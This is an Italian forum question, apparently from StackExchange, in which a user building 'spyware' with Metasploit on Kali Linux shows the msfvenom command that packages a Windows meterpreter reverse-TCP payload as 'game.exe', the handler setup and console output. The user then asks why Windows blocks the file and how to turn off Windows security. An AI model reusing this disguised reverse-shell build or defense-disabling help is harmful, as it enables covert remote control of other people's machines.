Ho un problema piuttosto complesso nelle mie mani. Recentemente ho avuto l'ambizione di provare nuove funzionalità di Metasploit (su Kali Linux 2017.1). Ho due computer, quindi ho pensato che fosse un ambiente perfetto per la sperimentazione. Il mio "sistema principale" in questo caso era il laptop HP EliteBook 8760w. Sono sorti due problemi:
La mia principale ambizione in entrambi i casi era di monitorare un dispositivo distante attraverso interfacce diverse. Innanzitutto ho cercato di raggiungere il mio obiettivo creando un programma spyware. Ecco la mia procedura:
root@smerdjakov:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.103 LPORT=8080 -f exe > game.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of exe file: 73802 bytes
root@smerdjakov:~# msfconsole
Metasploit Park, System Security Interface
Version 4.0.5, Alpha E
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.0.103
lhost => 192.168.0.103
msf exploit(handler) > set lport 8080
lport => 8080
msf exploit(handler) > exploit -j -z
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.0.103:8080
[*] Starting the payload handler...
msf exploit(handler) >
A questo punto, tutto è andato come previsto: ho compilato tutte le funzioni, ho ottenuto il file .exe con un carico utile. L'idea principale era quella di eseguire questo programma su un altro computer (con sistema operativo Windows 7/8/10) e il prompt Metasploit avvia automaticamente il monitoraggio del sistema. Tuttavia, quando ho provato a eseguire il mio game.exe come amministratore su Windows 10, questo messaggio è comparso:
Operation did not complete successfully because a file contains a virus or
potentially unwanted software.
Ho aggiunto un strong livello di crittografia, quindi ho trovato strano che il mio programma non si avvii. Sul mio Kali Linux ho aperto game.exe con Leafpad. Tutto ciò che ho trovato è stato:
MZ
È normale? In primo luogo, vorrei sapere come disattivare la sicurezza di Windows completamente e, in secondo luogo, se il mio file game.exe è addirittura funzionale. Dovrei dire che dopo 'MZ' c'è un altro glifo che l'interfaccia di StackExchange non può interpretare: sembra un quadrato con due zeri in cima e un 9 e uno in basso. Ad esempio:
MZ 0 0
9 0
Il tuo aiuto è molto apprezzato. Grazie in anticipo.